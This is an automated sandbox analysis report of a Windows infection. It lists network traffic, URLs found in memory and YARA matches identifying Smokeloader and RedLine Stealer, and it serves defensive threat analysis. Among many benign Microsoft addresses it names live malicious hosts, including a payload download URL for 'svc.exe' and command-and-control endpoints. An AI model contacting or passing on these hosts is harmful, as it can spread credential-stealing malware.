        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 14:36:30 GMTData Raw: 03 00 00 00 7d 4f d6 Data Ascii: }O
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 14:36:30 GMT
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 04 Oct 2024 14:36:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 14:36:47 GMTData Raw: 03 00 00 00 7d 4f d6 Data Ascii: }O
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 14:36:48 GMT
        Source: powershell.exe, 00000003.00000002.1874377114.000002320161C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1874377114.000002320134F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1874377114.0000023201617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bestmagazineforanimalsunicum.ru
        Source: powershell.exe, 00000003.00000002.1874377114.0000023200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1874377114.000002320022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bestmagazineforanimalsunicum.ru/download/svc.exe
        Source: powershell.exe, 00000003.00000002.1932207758.00000232753A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bestmagazineforanimalsunicum.ru/download/svc.exeO
        Source: powershell.exe, 00000003.00000002.1932207758.0000023275360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bestmagazineforanimalsunicum.ru/download/svc.exengsTO
        Source: explorer.exe, 00000008.00000000.1978252250.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1980163122.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: explorer.exe, 00000008.00000002.2954011281.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ceoconstractionstore.pl/
        Source: explorer.exe, 00000008.00000002.2954011281.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ceoconstractionstore.pl/M
        Source: explorer.exe, 00000008.00000002.2950883085.0000000009390000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2954011281.000000000C700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2956166137.000000000E740000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2954011281.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ceoconstractionstore.pl/index.php
        Source: explorer.exe, 00000008.00000002.2954011281.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ceoconstractionstore.pl/index.phppl
        Source: explorer.exe, 00000008.00000000.1978252250.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1980163122.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: explorer.exe, 00000008.00000000.1978252250.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1980163122.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: explorer.exe, 00000008.00000002.2955751786.000000000CA8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gqhcklmysxvvdkln.com/
        Source: powershell.exe, 00000003.00000002.1914266779.00000232101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1874377114.00000232016BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1914266779.000002321007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: explorer.exe, 00000008.00000000.1978252250.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1980163122.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: explorer.exe, 00000008.00000000.1978252250.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
        Source: powershell.exe, 00000003.00000002.1874377114.000002320022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: explorer.exe, 00000008.00000000.1985473351.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2955712554.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
        Source: explorer.exe, 00000008.00000000.1985473351.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2955712554.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
        Source: explorer.exe, 00000008.00000000.1979216492.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1979620182.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.2952007827.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: powershell.exe, 00000003.00000002.1874377114.0000023200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: explorer.exe, 00000008.00000002.2955751786.000000000CA8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://unicexpertmagazine.pw/index.php
        Source: explorer.exe, 00000008.00000002.2951802607.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://unicexpertmagazine.pw:80/index.php
        Source: powershell.exe, 00000003.00000002.1874377114.000002320022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: explorer.exe, 00000008.00000000.1983343701.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
        Source: explorer.exe, 00000008.00000000.1978252250.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
        Source: explorer.exe, 00000008.00000000.1978252250.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
        Source: powershell.exe, 00000003.00000002.1874377114.0000023200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: explorer.exe, 00000008.00000000.1983343701.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 00000008.00000000.1980163122.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 00000008.00000000.1980163122.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
        Source: explorer.exe, 00000008.00000002.2946279964.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2947138888.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1976285647.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1977159783.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000008.00000000.1980163122.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
        Source: explorer.exe, 00000008.00000000.1980163122.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000008.00000000.1980163122.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
        Source: explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
        Source: explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 00000008.00000000.1978252250.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
        Source: explorer.exe, 00000008.00000000.1978252250.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
        Source: powershell.exe, 00000003.00000002.1914266779.000002321007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000003.00000002.1914266779.000002321007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000003.00000002.1914266779.000002321007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: explorer.exe, 00000008.00000002.2954011281.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1983343701.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: powershell.exe, 00000003.00000002.1874377114.000002320022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000003.00000002.1874377114.0000023200C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
        Source: explorer.exe, 00000008.00000000.1978252250.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
        Source: powershell.exe, 00000003.00000002.1914266779.00000232101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1874377114.00000232016BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1914266779.000002321007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: explorer.exe, 00000008.00000002.2954011281.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1983343701.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
        Source: explorer.exe, 00000008.00000002.2954011281.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1983343701.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000008.00000000.1983343701.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
        Source: explorer.exe, 00000008.00000002.2954011281.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1983343701.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
        Source: explorer.exe, 00000008.00000000.1978252250.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
        Source: explorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: Yara matchFile source: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1994744005.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1994821763.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2270678080.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2270739394.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000005.00000002.1994744005.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000005.00000002.1994821763.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000009.00000002.2270864226.000000000082D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000009.00000002.2270678080.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000009.00000002.2270658140.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000005.00000002.1994949567.000000000078E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000009.00000002.2270739394.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000005.00000002.1994716777.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\oBuf.exeJump to dropped file
        Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
